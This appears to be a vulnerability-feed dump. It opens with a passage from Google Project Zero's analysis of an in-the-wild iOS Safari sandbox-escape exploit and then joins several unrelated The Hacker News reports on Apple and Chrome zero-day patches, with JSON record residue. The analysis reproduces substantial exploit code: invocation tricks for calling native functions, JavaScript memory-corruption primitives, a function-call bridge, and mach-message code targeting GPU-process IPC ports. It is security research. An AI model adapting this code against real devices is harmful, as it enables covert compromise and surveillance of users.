writeup](<https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-3.html>), that there were Objective-C methods such as [CNFileServices dlsym:] which would directly give you the ability to call dlsym and get PACIZA-signed function pointers.)\n\n### Do look up\n\nArmed with a signed dlsym pointer they use the nested invocation trick to call dlsym 22 times to get 22 more signed function pointers, assigning them to numbered variables:\n\n#define f_def(v_index, sym) \\\\\\\n\nid v_symInvocation = [v_templateInvocation copy];\n\n[v_#sym#Invocation setTarget:[@0xfffffffffffffffe longLongValue] ];\n\n[v_#sym#Invocation setSelector:[@\"sym\" UTF8String] ];\n\nid v_#sym#InvocationIMP = [v_templateInvocation 
copy];\n\n[v_#sym#InvocationIMP setSelector:[v_invokeUsingIMP:_NSFunctionExpression longLongValue] ];\n\n[v_writeInvocationName setSelector:[v_dlsymPtr longLongValue] ];\n\n[v_writeInvocationName getArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x1 longLongValue] ];\n\n[v_#sym#InvocationIMP setArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x2 longLongValue] ];\n\n[v_#sym#InvocationIMP setTarget:v_symInvocation ];\n\n[v_#sym#InvocationIMP invoke];\n\nid v_#sym#____converted = [NSNumber numberWithUnsignedLongLong:[@0xaaaaaaaaaaaaaaa longLongValue] ];\n\n[v_#sym#Invocation getReturnValue:[set_msb(add([NSNumber numberWithUnsignedLongLong:v_#sym#____converted ], @0x10)) longLongValue] ];\n\nid v_#sym# = v_#sym#____converted;\n\nid v_#index = v_#sym;\n\n}\n\nf_def(0, syscall)\n\nf_def(1, task_self_trap)\n\nf_def(2, task_get_special_port)\n\nf_def(3, mach_port_allocate)\n\nf_def(4, sleep)\n\nf_def(5, mach_absolute_time)\n\nf_def(6, mach_msg)\n\nf_def(7, mach_msg2_trap)\n\nf_def(8, mach_msg_send)\n\nf_def(9, mach_msg_receive)\n\nf_def(10, mach_make_memory_entry)\n\nf_def(11, mach_port_type)\n\nf_def(12, IOMainPort)\n\nf_def(13, IOServiceMatching)\n\nf_def(14, IOServiceGetMatchingService)\n\nf_def(15, IOServiceOpen)\n\nf_def(16, IOConnectCallMethod)\n\nf_def(17, open)\n\nf_def(18, sprintf)\n\nf_def(19, printf)\n\nf_def(20, OSSpinLockLock)\n\nf_def(21, objc_msgSend)\n\n### Another path\n\nStill not satisfied with the ability to call arbitrary (exported, named) functions from NSExpressions the exploit now takes yet another turn and comes, in a certain sense, full circle by creating a JSContext object to evaluate javascript code embedded in a string inside the NSExpression:\n\nid v_JSContext = [[JSContext alloc] init];\n\n[v_JSContext evaluateScript:@\"function hex(b){return(\\\"0\\\"+b.toString(16)).substr(-2)}function hexlify(bytes){var 
res=[];for(var i=0...\" ];\n\n...\n\nThe exploit evaluates three separate scripts inside this same context:\n\n### JS 1\n\nThe first script defines a large set of utility types and functions common to many JS engine exploits. For example it defines a Struct type:\n\nconst Struct = function() {\n\nvar buffer = new ArrayBuffer(8);\n\nvar byteView = new Uint8Array(buffer);\n\nvar uint32View = new Uint32Array(buffer);\n\nvar float64View = new Float64Array(buffer);\n\nreturn {\n\npack: function(type, value) {\n\nvar view = type;\n\nview[0] = value;\n\nreturn new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT)\n\n},\n\nunpack: function(type, bytes) {\n\nif (bytes.length !== type.BYTES_PER_ELEMENT) throw Error(\"Invalid bytearray\");\n\nvar view = type;\n\nbyteView.set(bytes);\n\nreturn view[0]\n\n},\n\nint8: byteView,\n\nint32: uint32View,\n\nfloat64: float64View\n\n}\n\n}();\n\nThe majority of the code is defining a custom fully-featured Int64 type.\n\nAt the end they define two [very useful helper functions](<http://www.phrack.org/issues/70/3.html#article>):\n\nfunction addrof(obj) {\n\naddrof_obj_ary[0] = obj;\n\nvar addr = Int64.fromDouble(addrof_float_ary[0]);\n\naddrof_obj_ary[0] = null;\n\nreturn addr\n\n}\n\nfunction fakeobj(addr) {\n\naddrof_float_ary[0] = addr.asDouble();\n\nvar fake = addrof_obj_ary[0];\n\naddrof_obj_ary[0] = null;\n\nreturn fake\n\n}\n\nas well as a read64() primitive:\n\nfunction read64(addr) {\n\nread64_float_ary[0] = addr.asDouble();\n\nvar tmp = \"\";\n\nfor (var it = 0; it < 4; it++) {\n\ntmp = (\"000\" + read64_str.charCodeAt(it).toString(16)).slice(-4) + tmp\n\n}\n\nvar ret = new Int64(\"0x\" + tmp);\n\nreturn ret\n\n}\n\nOf course, these primitives don't actually work - they are the standard primitives which would usually be built from a JS engine vulnerability like a JIT compiler bug, but there's no vulnerability being exploited here. 
Instead, after this script has been evaluated the NSExpression uses the [JSContext objectForKeyedSubscript] method to look up the global objects used by those primitives and directly corrupt the underlying objects like the arrays used by addrof and fakeobj such that they work.\n\nThis sets the stage for the second of the three scripts to run:\n\n### JS 2\n\nJS2 uses the corrupted addrof_* arrays to build a write64 primitive then declares the following dictionary:\n\nvar all_function = {\n\nsyscall: 0n,\n\nmach_task_self: 1n,\n\ntask_get_special_port: 2n,\n\nmach_port_allocate: 3n,\n\nsleep: 4n,\n\nmach_absolute_time: 5n,\n\nmach_msg: 6n,\n\nmach_msg2_trap: 7n,\n\nmach_msg_send: 8n,\n\nmach_msg_receive: 9n,\n\nmach_make_memory_entry: 10n,\n\nmach_port_type: 11n,\n\nIOMainPort: 12n,\n\nIOServiceMatching: 13n,\n\nIOServiceGetMatchingService: 14n,\n\nIOServiceOpen: 15n,\n\nIOConnectCallMethod: 16n,\n\nopen: 17n,\n\nsprintf: 18n,\n\nprintf: 19n\n\n};\n\nThese match up perfectly with the first 20 symbols which the NSExpression looked up via dlsym.\n\nFor each of those symbols they define a JS wrapper, like for example this one for task_get_special_port:\n\nfunction task_get_special_port(task, which_port, special_port) {\n\nreturn fcall(all_function[\"task_get_special_port\"], task, which_port, special_port)\n\n}\n\nThey declare two ArrayBuffers, one named lock and one named func_buffer:\n\nvar lock = new Uint8Array(32);\n\nvar func_buffer = new BigUint64Array(24);\n\nThey use the read64 primitive to store the address of those buffers into two more variables, then set the first byte of the lock buffer to 1:\n\nvar lock_addr = read64(addrof(lock).add(16)).noPAC().asDouble();\n\nvar func_buffer_addr = read64(addrof(func_buffer).add(16)).noPAC().asDouble();\n\nlock[0] = 1;\n\nThey then define the fcall function which the JS wrappers use to call the native symbols:\n\nfunction\n\nfcall(func_idx,\n\nx0 = 0x34343434n, x1 = 1n, x2 = 2n, x3 = 3n,\n\nx4 = 4n, x5 = 5n, x6 = 6n, x7 
= 7n,\n\nvarargs = [0x414141410000n,\n\n0x515151510000n,\n\n0x616161610000n,\n\n0x818181810000n])\n\n{\n\nif (typeof x0 !== \"bigint\") x0 = BigInt(x0.toString());\n\nif (typeof x1 !== \"bigint\") x1 = BigInt(x1.toString());\n\nif (typeof x2 !== \"bigint\") x2 = BigInt(x2.toString());\n\nif (typeof x3 !== \"bigint\") x3 = BigInt(x3.toString());\n\nif (typeof x4 !== \"bigint\") x4 = BigInt(x4.toString());\n\nif (typeof x5 !== \"bigint\") x5 = BigInt(x5.toString());\n\nif (typeof x6 !== \"bigint\") x6 = BigInt(x6.toString());\n\nif (typeof x7 !== \"bigint\") x7 = BigInt(x7.toString());\n\nlet sanitised_varargs =\n\nvarargs.map(\n\n(x => typeof x !== \"bigint\" ? BigInt(x.toString()) : x));\n\nfunc_buffer[0] = func_idx;\n\nfunc_buffer[1] = x0;\n\nfunc_buffer[2] = x1;\n\nfunc_buffer[3] = x2;\n\nfunc_buffer[4] = x3;\n\nfunc_buffer[5] = x4;\n\nfunc_buffer[6] = x5;\n\nfunc_buffer[7] = x6;\n\nfunc_buffer[8] = x7;\n\nsanitised_varargs.forEach(((x, i) => {\n\nfunc_buffer[i + 9] = x\n\n}));\n\nlock[0] = 0;\n\nlock[4] = 0;\n\nwhile (lock[4] != 1);\n\nreturn new Int64(\"0x\" + func_buffer[0].toString(16))\n\n}\n\nThis coerces each argument to a BigInt then fills the func_buffer first with the index of the function to call then each argument in turn. It clears two bytes in the lock ArrayBuffer then waits for one of them to become 1 before reading the return value, effectively implementing a spinlock.\n\nJS 2 doesn't call fcall though. 
We now return back to the NSExpression to analyse what must be the other side of that ArrayBuffer \"shared memory\" function call primitive.\n\n### In the background\n\nOnce JS 2 has been evaluated the NSExpression again uses the [JSContext objectForKeyedSubscript:] method to read the lock_addr and func_buffer_addr variables.\n\nIt then creates another NSInvocation but this time instead of using the double invocation trick it sets the target of the NSInvocation to an NSExpression; sets the selector to expressionValueWithObject: and the second argument to the context dictionary which contains the variables defined in the NSExpression. They then call performSelectorInBackground:sel(invoke), causing part of the serialized object to be evaluated in a different thread. It's that background code which we'll look at now:\n\n### Loopy landscapes\n\nNSExpressions aren't great for building loop primitives. We already saw that the loop to traverse the linked-list of pthreads was just unrolled 100 times. This time around they want to create an infinite loop, which can't just be unrolled! Instead they use the following construct:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5e89bmNK8v8WM2cl1eMnnyfNhq-TYvPsWCPIjpLsaWckLRv_SC288D5g0_pJCuhfAlkAiiYUdr8xnUgr1StYkDy2UjkDPVhFgsYaNvVI4BawF6aSnNCqNIYHXOKMv98NlyYZ0iXOSnR9MINhZwl34wg7qWJuHoRLPtVh59Ggr6k3ehTsdhyLd81TeFQ/s608/image12.png>)\n\nThey build a tree where each sub-level is evaluated twice by having two arguments which both point to the same expression. Right at the bottom of this tree we find the actual loop body. 
There are 33 of these doubling-nodes meaning the loop body will be evaluated 2^33 times, effectively a while(1) loop.\n\nLet's look at the body of this loop:\n\n[v_OSSpinLockLockInvocationInstance\n\nsetTarget:[v_functions_listener_lock longLongValue] ];\n\n[v_OSSpinLockLockInvocationInstance\n\nsetSelector:[@0x43434343 longLongValue] ];\n\n[v_OSSpinLockLockInvocationInstanceIMP\n\nsetTarget:v_OSSpinLockLockInvocationInstance ];\n\n[v_OSSpinLockLockInvocationInstanceIMP invoke];\n\nv_functions_listener_lock is the address of the backing buffer of the ArrayBuffer containing the \"spinlock\" which the JS unlock after writing all the function call parameters into the func_buffer ArrayBuffer. This calls OSSpinLockLock to lock that lock.\n\nThe NSExpression reads the function index from the func_buffer ArrayBuffer backing buffer then reads 19 argument slots, writing each 64-bit value into the corresponding slot (target, selector, arguments) of an NSInvocation. They then convert the function index into a string and call valueForKey on the context dictionary which stores all the NSExpression variables to find the variable with the provided numeric string name (recall that they defined a variable called '0' storing a PACIZA'ed pointer to \"syscall\".)\n\nThey use the double invocation trick to call the target function then extract the return value from the NSInvocation and write it into the func_buffer:\n\n[v_serializedInvName getReturnValue:[set_msb(v_functions_listener_buffer) longLongValue] ];\n\nFinally, the loop body ends with an arbitrary write to unlock the spinlock, allowing the JS which was spinning to continue and read the function call result from the ArrayBuffer.\n\nThen back in the main NSExpression thread it evaluates one final piece of JS in the same JSContext:\n\n### JS3\n\nUnlike JS1 and 2 and the NSExpression, JS 3 is stripped and partially obfuscated, though with some analysis most of the names can be recovered. 
For example, the script starts by defining a number of constants. These in fact come from a number of system headers, and the values appear in exactly the same order as in those headers, which is what makes the names recoverable (the recovered name follows each obfuscated one):

const z = 16;            // MACH_MSG_TYPE_MOVE_RECEIVE
const u = 17;            // MACH_MSG_TYPE_MOVE_SEND
const m = 18;            // MACH_MSG_TYPE_MOVE_SEND_ONCE
const x = 19;            // MACH_MSG_TYPE_COPY_SEND
const f = 20;            // MACH_MSG_TYPE_MAKE_SEND
const v = 21;            // MACH_MSG_TYPE_MAKE_SEND_ONCE
const b = 22;            // MACH_MSG_TYPE_COPY_RECEIVE
const p = 24;            // MACH_MSG_TYPE_DISPOSE_RECEIVE
const l = 25;            // MACH_MSG_TYPE_DISPOSE_SEND
const w = 26;            // MACH_MSG_TYPE_DISPOSE_SEND_ONCE
const y = 0;             // MACH_MSG_PORT_DESCRIPTOR
const B = 1;             // MACH_MSG_OOL_DESCRIPTOR
const I = 2;             // MACH_MSG_OOL_PORTS_DESCRIPTOR
const F = 3;             // MACH_MSG_OOL_VOLATILE_DESCRIPTOR
const U = 4;             // MACH_MSG_GUARDED_PORT_DESCRIPTOR
const k = 2147483648;    // MACH_MSGH_BITS_COMPLEX (0x80000000)
const C = 1;             // MACH_SEND_MSG
const N = 2;             // MACH_RCV_MSG
const S = 4;             // MACH_RCV_LARGE
const T = 0x200000000n;  // MACH64_SEND_KOBJECT_CALL

The code begins by using a number of symbols passed in from the outer RCE JS to find the HashMap storing the mach ports implementing the WebContent to GPU Process IPC. The 0x0a1a0a1a... values below are placeholders for those symbols; the trailing comments give the actual offsets:

// WebKit::GPUProcess::GPUProcess
var WebKit::GPUProcess::GPUProcess = new Int64("0x0a1a0a1a0a2a0a2a");
// offset of m_webProcessConnections HashMap in GPUProcess
var offset_of_m_webProcessConnections = new Int64("0x0a1a0a1a0a2a0a2b"); // 136
// offset of IPC::Connection m_connection in GPUConnectionToWebProcess
var offset_of_m_connection_in_GPUConnectionToWebProcess = new Int64("0x0a1a0a1a0a2a0a2c"); // 48
// 
offset of m_sendPort\n\nvar offset_of_m_sendPort_in_IPC_Connection = new Int64(\"0x0a1a0a1a0a2a0a2d\"); // 280 \n\n// find the m_webProcessConnections HashMap:\n\nvar m_webProcessConnections = \n\nread64( WebKit::GPUProcess::GPUProcess.add(\n\noffset_of_m_webProcessConnections)).noPAC();\n\nThey iterate through all the entries in that HashMap to collect all the mach ports representing all the GPU Process to WebContent IPC connections:\n\nvar entries_cnt = read64(m_webProcessConnections.sub(8)).hi().asInt32();\n\nvar GPU_to_WebProcess_send_ports = [];\n\nfor (var he = 0; he < entries_cnt; he++) {\n\nvar hash_map_key = read64(m_webProcessConnections.add(he * 16));\n\nif (hash_map_key.is0() ||\n\nhash_map_key.equals(const_int64_minus_1))\n\n{\n\ncontinue\n\n}\n\nvar GPUConnectionToWebProcess = \n\nread64(m_webProcessConnections.add(he * 16 + 8));\n\nif (GPUConnectionToWebProcess.is0()) {\n\ncontinue\n\n}\n\nvar m_connection = \n\nread64(\n\nGPUConnectionToWebProcess.add(\n\noffset_of_m_connection_in_GPUConnectionToWebProcess));\n\nvar m_sendPort =\n\nBigInt(read64(\n\nm_connection.add(\n\noffset_of_m_sendPort_in_IPC_Connection)).lo().asInt32());\n\nGPU_to_WebProcess_send_ports.push(m_sendPort)\n\n}\n\nThey allocate a new mach port then iterate through each of the GPU Process to WebContent connection ports, sending each one a mach message with a port descriptor containing a send right to the newly allocated port:\n\nfor (let WebProcess_send_port of GPU_to_WebProcess_send_ports) {\n\nfor (let _ = 0; _ < d; _++) {\n\n// memset the message to 0\n\nfor (let e = 0; e < msg.byteLength; e++) {\n\nmsg.setUint8(e, 0)\n\n}\n\n// complex message\n\nhello_msg.header.msgh_bits.set(\n\nmsg, MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0);\n\n// send to the web process\n\nhello_msg.header.msgh_remote_port.set(\n\nmsg, WebProcess_send_port, 0);\n\nhello_msg.header.msgh_size.set(msg, hello_msg.__size, 0);\n\n// one descriptor\n\nhello_msg.body.msgh_descriptor_count.set(\n\nmsg, 1, 
hello_msg.header.__size);\n\n// send a right to the comm port:\n\nhello_msg.communication_port.name.set(\n\nmsg, comm_port_receive_right,\n\nhello_msg.header.__size + hello_msg.body.__size);\n\n// give other side a send right\n\nhello_msg.communication_port.disposition.set(\n\nmsg, MACH_MSG_TYPE_MAKE_SEND, \n\nhello_msg_buffer.header.__size + hello_msg.body.__size);\n\nhello_msg.communication_port.type.set(\n\nmsg, MACH_MSG_PORT_DESCRIPTOR,\n\nhello_msg.header.__size + hello_msg.body.__size);\n\nmsg.setBigUint64(hello_msg.data.offset, BigInt(_), true);\n\n// send the request\n\nkr = mach_msg_send(u8array_backing_ptr(msg));\n\nif (kr != KERN_SUCCESS) {\n\ncontinue\n\n}\n\n}\n\nNote that, apart from having to use ArrayBuffers instead of pointers, this looks almost like it would if it was written in C and executing truly arbitrary native code. But as we've seen, there's a huge amount of complexity hidden behind that simple call to mach_msg_send.\n\nThe JS then tries to receive a reply to the hello message, and if they do it's assumed that they have found the WebContent process which compromised the GPU process and is waiting for the GPU process exploit to succeed.\n\nIt's at this point that we finally approach the final stages of this writeup.\n\n### Last Loops\n\nHaving established a new communications channel with the native code running in the WebContent process the JS enters an infinite loop waiting to service requests:\n\nfunction handle_comms_with_compromised_web_process(comm_port) {\n\nvar kr = KERN_SUCCESS;\n\nlet request_msg = alloc_message_from_proto(req_proto);\n\nwhile (true) {\n\nfor (let e = 0; e < request_msg.byteLength; e++) {\n\nrequest_msg.setUint8(e, 0)\n\n}\n\nreq_proto.header.msgh_local_port.set(request_msg, comm_port, 0);\n\nreq_proto.msgh_size.set(request_msg, req_proto.__size, 0);\n\n// get a request\n\nkr = mach_msg_receive(u8array_backing_ptr(request_msg));\n\nif (kr != KERN_SUCCESS) {\n\nreturn kr\n\n}\n\nlet msgh_id = 
req_proto.header.msgh_id.get(request_msg, 0);\n\nhandle_request_from_web_process(msgh_id, request_msg)\n\n}\n\n}\n\nIn the end, this entire journey culminates in the vending of 9 new js-implemented IPCs (msgh_id values 0 through 8.)\n\n### IPC 0:\n\nJust sends a reply message containing KERN_SUCCESS\n\n### IPC 1 - 4\n\nThese interact with the AppleM2ScalerCSCDriver userclient and presumably trigger the kernel bug.\n\n### IPC 5:\n\nWraps io_service_open_extended, taking a service name and connection type.\n\n### IPC 6:\n\nThis takes an address and a size and creates a VM_PROT_READ | VM_PROT_WRITE mach_memory_entry covering the requested region which it returns via a port descriptor.\n\n### IPC 7:\n\nThis IPC extracts and returns via a MOVE_SEND disposition the requested mach port name.\n\n### IPC 8:\n\nThis simply calls the exit syscall, presumably to cleanly terminate the process. If that fails, it causes a NULL pointer dereference to crash the process:\n\ncase request_id_const_8: {\n\nsyscall(1, 0);\n\nread64(new Int64(\"0x00000000\"));\n\nbreak\n\n}\n\n### Conclusion\n\nThis exploit was undoubtedly complex. Often this complexity is interpreted as a sign that the difficulty of finding and exploiting vulnerabilities is increasing. Yet the buffer overflow vulnerability at the core of this exploit was not complex - it was a well-known, simple anti-pattern in a programming language whose security weaknesses have been studied for decades. I imagine that this vulnerability was relatively easy for the attackers to discover.\n\nThe vast majority of the complexity lay in the later post-compromise stages - the glue which connected this IPC vulnerability to the next one in the chain. In my opinion, the reason the attackers invested so much time and effort in this part is that it's reusable. 
It is a high one-time cost which then hugely decreases the marginal cost of gluing the next IPC bug to the next kernel bug.

Even in a world with NX memory, mandatory code signing, pointer authentication and a myriad of other mitigations, creative attackers are still able to build [weird machines](<https://ieeexplore.ieee.org/document/8226852>) just as powerful as native code. The age of data-only exploitation is truly here, and yet another mitigation to fix one more trick is unlikely to end that. What does make a difference is focusing on the fundamentals: early-stage design and code reviews, broad testing and code quality. This vulnerability was introduced less than two years ago; we as an industry should, at a minimum, be aiming to ensure that at least new code is vetted for well-known vulnerabilities like buffer overflows. That is a low bar which is clearly still not being met.

Source: Google Project Zero, "An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit", https://googleprojectzero.blogspot.com/2023/10/an-analysis-of-an-in-the-wild-ios-safari-sandbox-escape.html, published 2023-10-13 (record GOOGLEPROJECTZERO:79C0B1D78EE7B7F805411C0711DA81BD). CVEs: CVE-2023-28205, CVE-2023-28206, CVE-2023-32409. CVSS v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H); CVSS v2: 6.8 MEDIUM (AV:N/AC:M/Au:N/C:P/I:P/A:P).

[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjAJGJ4utVhAUXUHyNPRlO1YZUYX4DKNhN7na-oo-T-jvPt9Vj7MTD0m3tDvLyKSEvbYf0rsotHAY8nafpRXQrB9OeLiZBoGverhucWOGVThcBs2qDUfyGW-a8Ydr8yieRqQuY19GE225em1q-U50UO71hFiZLBn8yBfUzX9UYGY48hOFp-UfUXafqO/s728-e365/apple.png>)

Apple on Friday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213720>), [macOS](<https://support.apple.com/en-us/HT213721>), and [Safari web browser](<https://support.apple.com/en-us/HT213722>) to address a pair of zero-day flaws that are being exploited in the wild.

The two vulnerabilities are as follows:

 * **CVE-2023-28205** - A [use after free issue](<https://cwe.mitre.org/data/definitions/416.html>) in WebKit that could lead to arbitrary code execution when processing specially crafted web content.
 * **CVE-2023-28206** - An [out-of-bounds write issue](<https://cwe.mitre.org/data/definitions/787.html>) in IOSurfaceAccelerator that could enable an app to execute arbitrary code with kernel privileges.

Apple said it addressed CVE-2023-28205 with improved memory management and the second with better input validation, adding it's aware the bugs "may have been actively exploited."

Credited with discovering and reporting the flaws are Clément Lecigne of Google's Threat Analysis Group (TAG) and Donncha Ó Cearbhaill of Amnesty International's Security Lab.

Details about the two vulnerabilities have been withheld in light of active exploitation and to prevent more threat actors from abusing them.

The 
updates are available in version iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1, and Safari 16.4.1. The fixes also span a wide range of devices:

 * iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
 * Macs running macOS Big Sur, Monterey, and Ventura

Apple has patched three zero-days since the start of the year. In February, Apple addressed another actively exploited zero-day ([CVE-2023-23529](<https://thehackernews.com/2023/02/patch-now-apples-ios-ipados-macos-and.html>)) in WebKit that could result in arbitrary code execution.

The development also comes as Google TAG [disclosed](<https://thehackernews.com/2023/03/spyware-vendors-caught-exploiting-zero.html>) that commercial spyware vendors are leveraging zero-days in Android and iOS to infect mobile devices with surveillance malware.

## Apple Expands Patches to Older Devices

Apple, on April 10, 2023, backported patches for the two actively exploited flaws to include older iPhones, iPads, and Macs. The updates are available for the following devices:

 * [iOS 15.7.5 and iPadOS 15.7.5](<https://support.apple.com/en-us/HT213723>) - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
 * macOS [Big Sur 11.7.6](<https://support.apple.com/en-us/HT213725>) and [Monterey 12.6.5](<https://support.apple.com/en-us/HT213724>) (It's worth noting that the update only addresses CVE-2023-28206.)

Source: The Hacker News, "Apple Releases Updates to Address Zero-Day Flaws in iOS, iPadOS, macOS, and Safari", https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html, published 2023-04-08, modified 2023-04-11 (record THN:CE48B3DDA855F117035F84E39BB0D811). CVEs: CVE-2023-23529, CVE-2023-28205, CVE-2023-28206. CVSS v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi3-1t-O1Y4Oqvj24RGfItVIc7r4d1BOuWfRH4xG5ilh6GX83VydcDH0Fs1xqW5JUvFrpLzvA9ifqmf2lHts3lgA5VStlmb7c1Msk0yFUv5qzEgEjiU3_EPqVJlK4Z6uzMUFoKmnDAHWtOXsYNv7vEG8yG9H-NwH46z-Z7nAKiihKDF7bzl_Y20QXxS/s728-e100/chrome.png>)

Search giant Google on Friday released an out-of-band security update to fix a new actively exploited zero-day flaw in its Chrome web browser.

The high-severity flaw, tracked as [CVE-2022-4262](<https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html>), concerns a type confusion bug in the V8 JavaScript engine. 
Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on November 29, 2022.\n\nType confusion vulnerabilities could be weaponized by threat actors to perform out-of-bounds memory access, or lead to a crash and arbitrary code execution.\n\nAccording to the NIST's National Vulnerability Database, the flaw [permits](<https://nvd.nist.gov/vuln/detail/CVE-2022-4262>) a \"remote attacker to potentially exploit heap corruption via a crafted HTML page.\"\n\nGoogle acknowledged active exploitation of the vulnerability but stopped short of sharing additional specifics to prevent further abuse.\n\nCVE-2022-4262 is the fourth actively exploited type confusion flaw in Chrome that Google has addressed since the start of the year. It's also the ninth zero-day flaw attackers have exploited in the wild in 2022 -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * [**CVE-2022-2856**](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in Intents\n * [**CVE-2022-3075**](<https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html>) \\- Insufficient data validation in Mojo\n * [**CVE-2022-3723**](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-4135**](<https://thehackernews.com/2022/11/update-chrome-browser-now-to-patch-new.html>) \\- Heap buffer overflow in GPU\n\nUsers are recommended to upgrade to version 
108.0.5359.94 for macOS and Linux and 108.0.5359.94/.95 for Windows to mitigate potential threats.\n\nUsers of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-12-03T04:41:00", "type": "thn", "title": "Google Rolls Out New Chrome Browser Update to Patch Yet Another Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723", "CVE-2022-4135", "CVE-2022-4262"], "modified": "2022-12-05T04:33:44", "id": "THN:2FB8A3C1E526D1FFA1477D35F0F70BF4", "href": "https://thehackernews.com/2022/12/google-rolls-out-new-chrome-browser.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpjCuGD4WXaNN6nxKO5EalNHXrEO1r2PgkwQYS5Z4fg1J1iNhNuSZu4tqOM6Ohl9vpp6QyHLYCS9rWACrVbbaIJUPQ9rTXrZPXmPG7SMzGybYouS2Gy54kBSr90hQqQD0npkDgUM7qiCLvQEpG86SHqny5-bN6yTHLRxPBtls52iaOhN5Ui-sM9RZ4/s728-e100/chrome-extensions.jpg>)\n\nGoogle on Thursday shipped emergency patches to address two security issues in its Chrome web browser, one of which it says is being actively exploited in the wild.\n\nTracked as [CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>), the tech giant described the high-severity bug as a case of type confusion in the V8 JavaScript engine. Cl\u00e9ment Lecigne of Google's Threat Analysis Group has been credited with reporting the flaw on April 13, 2022.\n\nAs is typically the case with actively exploited zero-day flaws, the company acknowledged it's \"aware that an exploit for CVE-2022-1364 exists in the wild.\" Additional details about the flaw and the identity of the threat actors have been withheld to prevent further abuse.\n\nWith the latest fix, Google has patched a total of three zero-day vulnerabilities in Chrome since the start of the year. It's also the second type confusion-related bug in V8 to be squashed in less than a month -\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6B83ZXigpC9fguwiLwmsTF6j73zc5NEtpSNiGfAAl-clSHcXVa31RbaQfOCfKesHRCqidahWfYEq_lTb6Wo-qPTz15of2-8gP75by67zdsyHfHawMXYaPWSZQLF1KIVi7jyn0uf4bWxBN0j73AHcGrmJOkXRdboYNb6jCKG2veHy3dPK8riejHmuo/s728-e100/chrome-update.jpg>)\n\nUsers are recommended to update to version 100.0.4896.127 for Windows, macOS, and Linux to thwart potential threats. 
